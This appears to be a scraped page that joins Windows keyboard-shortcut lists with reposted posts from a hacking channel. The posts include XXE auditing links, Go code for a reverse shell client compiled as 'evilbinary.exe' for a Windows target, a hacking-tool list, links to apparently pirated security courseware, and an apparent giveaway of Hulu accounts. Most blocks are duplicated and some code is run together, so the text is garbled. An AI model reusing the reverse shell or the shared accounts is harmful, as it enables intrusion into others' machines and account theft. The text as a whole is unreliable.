dhcpmgmt.msc = DHCP Management
dnsmgmt.msc = DNS Management
services.msc = Services
eventvwr = Event Viewer
dsa.msc = Active Directory Users and Computers
dssite.msc = Active Directory Sites and Services
Windows key + E = Explorer
ALT + Tab = Switch between windows
ALT, Space, X = Maximize window
CTRL + Shift + Esc = Task Manager
Windows key + Break = System properties
Windows key + F = Search
Windows key + D = Hide/Display all windows
CTRL + C = copy
CTRL + X = cut
CTRL + V = paste
Also don't forget about the "Right-click" key next to the right Windows key on your keyboard. Using the arrows and that key can get just about anything done once you've opened up any program.
Keyboard Shortcuts
Alt and Esc Switch between running applications
Alt and letter Select menu item by underlined letter
Ctrl and Esc Open Program Menu
Ctrl and F4 Close active document or group windows (does not work with some applications)
Alt and F4 Quit active application or close current window
Alt and - Open Control menu for active document
Ctrl] Lft., Rt. arrow Move cursor forward or back one word
Ctrl] Up, Down arrow Move cursor forward or back one paragraph
F1 Open Help for active application
Windows+M Minimize all open windows
Shift+Windows+M Undo minimize all open windows
Windows+F1 Open Windows Help
Windows+Tab Cycle through the Taskbar buttons
Windows+Break Open the System Properties dialog box
#git sources
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ basic principle / methodology, its utilization how can be audited, and defense -Helpfull tips :
1) 0x0 XXE Attack Methodes | The Quick and Dirty & Defense
https://github.com/OlivierLaflamme/Auditing-Vulnerabilities/blob/master/Auditing_XXE_Vulnerabilities/The_3_XXE.md
2) 0x1 Introduction
https://github.com/OlivierLaflamme/Auditing-Vulnerabilities/blob/master/Auditing_XXE_Vulnerabilities/The_3_XXE.md
3) 0x2 Restrictions to XML XXE
https://github.com/OlivierLaflamme/Auditing-Vulnerabilities/blob/master/Auditing_XXE_Vulnerabilities/Introduction.md
4) 0x3 Summary of Use
https://github.com/OlivierLaflamme/Auditing-Vulnerabilities/blob/master/Auditing_XXE_Vulnerabilities/Restrictions_XML_XXE.md
5) 0x4 Everything JAVA
https://github.com/OlivierLaflamme/Auditing-Vulnerabilities/tree/master/Auditing_XXE_Vulnerabilities/JAVA
6) 0x5 Everything PHP
https://github.com/OlivierLaflamme/Auditing-Vulnerabilities/tree/master/Auditing_XXE_Vulnerabilities/PHP
7) 0x6 The 1 Python Thing
https://github.com/OlivierLaflamme/Auditing-Vulnerabilities/tree/master/Auditing_XXE_Vulnerabilities/Python
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ basic principle / methodology, its utilization how can be audited, and defense -Helpfull tips :
1) 0x0 XXE Attack Methodes | The Quick and Dirty & Defense
https://github.com/OlivierLaflamme/Auditing-Vulnerabilities/blob/master/Auditing_XXE_Vulnerabilities/The_3_XXE.md
2) 0x1 Introduction
https://github.com/OlivierLaflamme/Auditing-Vulnerabilities/blob/master/Auditing_XXE_Vulnerabilities/The_3_XXE.md
3) 0x2 Restrictions to XML XXE
https://github.com/OlivierLaflamme/Auditing-Vulnerabilities/blob/master/Auditing_XXE_Vulnerabilities/Introduction.md
4) 0x3 Summary of Use
https://github.com/OlivierLaflamme/Auditing-Vulnerabilities/blob/master/Auditing_XXE_Vulnerabilities/Restrictions_XML_XXE.md
5) 0x4 Everything JAVA
https://github.com/OlivierLaflamme/Auditing-Vulnerabilities/tree/master/Auditing_XXE_Vulnerabilities/JAVA
6) 0x5 Everything PHP
https://github.com/OlivierLaflamme/Auditing-Vulnerabilities/tree/master/Auditing_XXE_Vulnerabilities/PHP
7) 0x6 The 1 Python Thing
https://github.com/OlivierLaflamme/Auditing-Vulnerabilities/tree/master/Auditing_XXE_Vulnerabilities/Python
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
GitHub
OlivierLaflamme/Auditing-Vulnerabilities
In this repository I'll host my research and methodologies for auditing vulnerabilities - OlivierLaflamme/Auditing-Vulnerabilities
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ A Reverse HTTP Shell In Kali Linux:
HEREβS WHAT YOU NEED :
1) Kali Linux Virtual Instance (VirtualBox)
2) Windows 10 Virtual Instance (VirtualBox) -OR-
3) Linux Virtual Instance (VirtualBox)
4) Here is the code for my program, in a file named tcpServer.go:
package main import (
"bufio"
"fmt"
"log"
"net"
"os/exec" "strings"
)
const (
RPORT = "4444"
)
func CheckErr(e error) {
if e != nil {
log.Fatal("Error %s", e)
}
}
func main() {
conn, err := net.Dial("tcp", fmt.Sprintf("10.0.2.5:%s", RPORT)) CheckErr(err)
remoteCmd, err := bufio.NewReader(conn).ReadString('\n') CheckErr(err)
// remove newline character
newCmd := strings.TrimSuffix(remoteCmd, "\n")
command := exec.Command(newCmd)
command.Stdin = conn
command.Stdout = conn
command.Stderr = conn
command.Run()
}
π¦After putting together the program I need to compile the client for Windows for my Windows target. This is how it is done below:
> 1 macbook$ GOOS=windows GOARCH=386 go build -o evilbinary.exe simpleClient.go
π¦ A Reverse HTTP Shell In Kali Linux:
HEREβS WHAT YOU NEED :
1) Kali Linux Virtual Instance (VirtualBox)
2) Windows 10 Virtual Instance (VirtualBox) -OR-
3) Linux Virtual Instance (VirtualBox)
4) Here is the code for my program, in a file named tcpServer.go:
package main import (
"bufio"
"fmt"
"log"
"net"
"os/exec" "strings"
)
const (
RPORT = "4444"
)
func CheckErr(e error) {
if e != nil {
log.Fatal("Error %s", e)
}
}
func main() {
conn, err := net.Dial("tcp", fmt.Sprintf("10.0.2.5:%s", RPORT)) CheckErr(err)
remoteCmd, err := bufio.NewReader(conn).ReadString('\n') CheckErr(err)
// remove newline character
newCmd := strings.TrimSuffix(remoteCmd, "\n")
command := exec.Command(newCmd)
command.Stdin = conn
command.Stdout = conn
command.Stderr = conn
command.Run()
}
π¦After putting together the program I need to compile the client for Windows for my Windows target. This is how it is done below:
> 1 macbook$ GOOS=windows GOARCH=386 go build -o evilbinary.exe simpleClient.go
2) The program works fine except for it is still primitive. I mean by that it
3) can not handle server crashes or unexpected input from the client.
FLAGS IN GO ARE EASY
4) If you donβt agree with the preceding statement, try setting flags in C#β¦Flags in go are supported by the standard library. All you have to do is set flags and interact with them to provide arguments to your
5) Here is a basic example of checking for arguments passed via the command line to our program. :
func main() {
// read args
arguments := os.Args
if len(arguments) == 1 {
fmt.Println("Not enough arguments!") return
}
> 1 macbook$ go run tcpServer.go -p 4444
6) The value after the flag will be read and passed to the value of *stringPtr. The following code will output βListening on 4444β¦β, because the value of the pointer to the string flag variable has been set as 4444.
7) LPORT := flag.String("p", "", "port to listen on")
fmt.Printf("lport is %s", *LPORT)
flag.Parse()
l, err := net.Listen("tcp4", fmt.Sprintf("127.0.0.1:%s", *LPORT)) CheckErr(err)
fmt.Printf("Listening on %s for incoming connections\n", *LPORT)
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
3) can not handle server crashes or unexpected input from the client.
FLAGS IN GO ARE EASY
4) If you donβt agree with the preceding statement, try setting flags in C#β¦Flags in go are supported by the standard library. All you have to do is set flags and interact with them to provide arguments to your
5) Here is a basic example of checking for arguments passed via the command line to our program. :
func main() {
// read args
arguments := os.Args
if len(arguments) == 1 {
fmt.Println("Not enough arguments!") return
}
> 1 macbook$ go run tcpServer.go -p 4444
6) The value after the flag will be read and passed to the value of *stringPtr. The following code will output βListening on 4444β¦β, because the value of the pointer to the string flag variable has been set as 4444.
7) LPORT := flag.String("p", "", "port to listen on")
fmt.Printf("lport is %s", *LPORT)
flag.Parse()
l, err := net.Listen("tcp4", fmt.Sprintf("127.0.0.1:%s", *LPORT)) CheckErr(err)
fmt.Printf("Listening on %s for incoming connections\n", *LPORT)
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Greatest 2020 Hacking tools-Tracking-backdoor and more...
0trace 1.5 A hop enumeration tool http://jon.oberheide.org/0trace/
3proxy 0.7.1.1 Tiny free proxy server. http://3proxy.ru/
3proxy-win32 0.7.1.1 Tiny free proxy server. http://3proxy.ru/
42zip 42 Recursive Zip archive bomb. http://blog.fefe.de/?ts=b6cea88d
acccheck 0.2.1 A password dictionary attack tool that targets windows authentication via the SMB protocol. http://labs.portcullis.co.uk/tools/acccheck/
Spyse OSINT gathering tool that scans the entire web, enrich and collect all the data in its own DB for instant access. Provided data: IPv4 hosts, sub/domains/whois, ports/banners/protocols, technologies, OS, AS, wide SSL/TLS DB and more. https://spyse.com/
findsubdomains Complete subdomains sacnning service.(works using OSINT). https://findsubdomains.com
sublist3r subdomains enumeration tool for penetration testers https://github.com/aboul3la/Sublist3r
ASlookup Made for identifying the owner of an IP range(CIDR), ASN, related ASN, registry, etc... http://aslookup.com
ace 1.10 Automated Corporate Enumerator. A simple yet powerful VoIP Corporate Directory enumeration tool that mimics the behavior of an IP Phone in order to download the name and extension entries that a given phone can display on its screen interface http://ucsniff.sourceforge.net/ace.html
admid-pack 0.1 ADM DNS spoofing tools - Uses a variety of active and passive methods to spoof DNS packets. Very powerful. http://packetstormsecurity.com/files/10080/ADMid-pkg.tgz.html
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Greatest 2020 Hacking tools-Tracking-backdoor and more...
0trace 1.5 A hop enumeration tool http://jon.oberheide.org/0trace/
3proxy 0.7.1.1 Tiny free proxy server. http://3proxy.ru/
3proxy-win32 0.7.1.1 Tiny free proxy server. http://3proxy.ru/
42zip 42 Recursive Zip archive bomb. http://blog.fefe.de/?ts=b6cea88d
acccheck 0.2.1 A password dictionary attack tool that targets windows authentication via the SMB protocol. http://labs.portcullis.co.uk/tools/acccheck/
Spyse OSINT gathering tool that scans the entire web, enrich and collect all the data in its own DB for instant access. Provided data: IPv4 hosts, sub/domains/whois, ports/banners/protocols, technologies, OS, AS, wide SSL/TLS DB and more. https://spyse.com/
findsubdomains Complete subdomains sacnning service.(works using OSINT). https://findsubdomains.com
sublist3r subdomains enumeration tool for penetration testers https://github.com/aboul3la/Sublist3r
ASlookup Made for identifying the owner of an IP range(CIDR), ASN, related ASN, registry, etc... http://aslookup.com
ace 1.10 Automated Corporate Enumerator. A simple yet powerful VoIP Corporate Directory enumeration tool that mimics the behavior of an IP Phone in order to download the name and extension entries that a given phone can display on its screen interface http://ucsniff.sourceforge.net/ace.html
admid-pack 0.1 ADM DNS spoofing tools - Uses a variety of active and passive methods to spoof DNS packets. Very powerful. http://packetstormsecurity.com/files/10080/ADMid-pkg.tgz.html
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
jon.oberheide.org
0trace.py | Jon Oberheide
Jon Oberheide's website
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦TOPIC HACKING COURSES & TOOLS 2020 :
SEC760 - Advanced Exploit Development for Penetration Testers : https://mirr.re/d/pTv
SEC617 - Wireless Penetration Testing and Ethical Hacking : https://mirr.re/d/pTy
SEC642 - Advanced Web App Penetration Testing, Ethical Hacking, and Exploitation Techniques : https://mirr.re/d/pTx
SEC660 - Advanced Penetration Testing, Exploit Writing, and Ethical Hacking : https://mirr.re/d/pTw
SEC580 - Metasploit Kung Fu for Enterprise Pen Testing : https://mirr.re/d/pU0
SEC599 - Defeating Advanced Adversaries - Implementing Kill Chain Defenses : https://mirr.re/d/pTz
SEC561 - Immersive Hands-on Hacking Techniques : https://mirr.re/d/pU4
SEC564 - Red Team Operations and Threat Emulation : https://mirr.re/d/pU3
SEC566 - Implementing and Auditing the Critical Security Controls - In-Depth : https://mirr.re/d/pU2
SEC573 - Automating Information Security with Python : https://mirr.re/d/pU1
SEC560 - Network Penetration Testing and Ethical Hacking : https://mirr.re/d/pUA
SEC550 - Active Defense, Offensive Countermeasures and Cyber Deception : https://mirr.re/d/pUC
SEC555 - SIEM with Tactical Analytics : https://mirr.re/d/pUB
SEC511 - Continuous Monitoring and Security Operations : https://mirr.re/d/pUE
SEC542 - Web App Penetration Testing and Ethical Hacking : https://mirr.re/d/pUD
SEC506 - Securing Linux-Unix : https://mirr.re/d/pUF
SEC504 - Hacker Tools, Techniques, Exploits, and Incident Handling : https://mirr.re/d/pUH
SEC505 - Securing Windows and PowerShell Automation : https://mirr.re/d/pUG
SEC501 - Advanced Security Essentials - Enterprise Defender : https://mirr.re/d/pUJ
SEC503 - Intrusion Detection In-Depth : https://mirr.re/d/pUI
SEC401 - Security Essentials Bootcamp Style : https://mirr.re/d/pUP
FOR610 - Reverse-Engineering Malware Malware Analysis Tools and Techniques : https://mirr.re/d/pUS
ICS410 - ICS SCADA Security Essentials : https://mirr.re/d/pUR
MGT514 - Security Strategic Planning, Policy, and Leadership : https://mirr.re/d/pUQ
FOR585 - Advanced Smartphone Forensics : https://mirr.re/d/pUT
FOR508 - Advanced Digital Forensics, Incident Response, and Threat Hunting : https://mirr.re/d/pUX
FOR518 - Mac and iOS Forensic Analysis and Incident Response : https://mirr.re/d/pUW
FOR526 - Memory Forensics In-Depth : https://mirr.re/d/pUV
FOR572 - Advanced Network Forensics Threat Hunting, Analysis, and Incident Response : https://mirr.re/d/pUU
FOR500 - Windows Forensic Analysis : https://mirr.re/d/pUY
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦TOPIC HACKING COURSES & TOOLS 2020 :
SEC760 - Advanced Exploit Development for Penetration Testers : https://mirr.re/d/pTv
SEC617 - Wireless Penetration Testing and Ethical Hacking : https://mirr.re/d/pTy
SEC642 - Advanced Web App Penetration Testing, Ethical Hacking, and Exploitation Techniques : https://mirr.re/d/pTx
SEC660 - Advanced Penetration Testing, Exploit Writing, and Ethical Hacking : https://mirr.re/d/pTw
SEC580 - Metasploit Kung Fu for Enterprise Pen Testing : https://mirr.re/d/pU0
SEC599 - Defeating Advanced Adversaries - Implementing Kill Chain Defenses : https://mirr.re/d/pTz
SEC561 - Immersive Hands-on Hacking Techniques : https://mirr.re/d/pU4
SEC564 - Red Team Operations and Threat Emulation : https://mirr.re/d/pU3
SEC566 - Implementing and Auditing the Critical Security Controls - In-Depth : https://mirr.re/d/pU2
SEC573 - Automating Information Security with Python : https://mirr.re/d/pU1
SEC560 - Network Penetration Testing and Ethical Hacking : https://mirr.re/d/pUA
SEC550 - Active Defense, Offensive Countermeasures and Cyber Deception : https://mirr.re/d/pUC
SEC555 - SIEM with Tactical Analytics : https://mirr.re/d/pUB
SEC511 - Continuous Monitoring and Security Operations : https://mirr.re/d/pUE
SEC542 - Web App Penetration Testing and Ethical Hacking : https://mirr.re/d/pUD
SEC506 - Securing Linux-Unix : https://mirr.re/d/pUF
SEC504 - Hacker Tools, Techniques, Exploits, and Incident Handling : https://mirr.re/d/pUH
SEC505 - Securing Windows and PowerShell Automation : https://mirr.re/d/pUG
SEC501 - Advanced Security Essentials - Enterprise Defender : https://mirr.re/d/pUJ
SEC503 - Intrusion Detection In-Depth : https://mirr.re/d/pUI
SEC401 - Security Essentials Bootcamp Style : https://mirr.re/d/pUP
FOR610 - Reverse-Engineering Malware Malware Analysis Tools and Techniques : https://mirr.re/d/pUS
ICS410 - ICS SCADA Security Essentials : https://mirr.re/d/pUR
MGT514 - Security Strategic Planning, Policy, and Leadership : https://mirr.re/d/pUQ
FOR585 - Advanced Smartphone Forensics : https://mirr.re/d/pUT
FOR508 - Advanced Digital Forensics, Incident Response, and Threat Hunting : https://mirr.re/d/pUX
FOR518 - Mac and iOS Forensic Analysis and Incident Response : https://mirr.re/d/pUW
FOR526 - Memory Forensics In-Depth : https://mirr.re/d/pUV
FOR572 - Advanced Network Forensics Threat Hunting, Analysis, and Incident Response : https://mirr.re/d/pUU
FOR500 - Windows Forensic Analysis : https://mirr.re/d/pUY
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦X56 HULU PREMIUMβ
> provide with screanshoat after login to @Undercode_bot
pastebin.com/9HdcwYHN
> provide with screanshoat after login to @Undercode_bot
pastebin.com/9HdcwYHN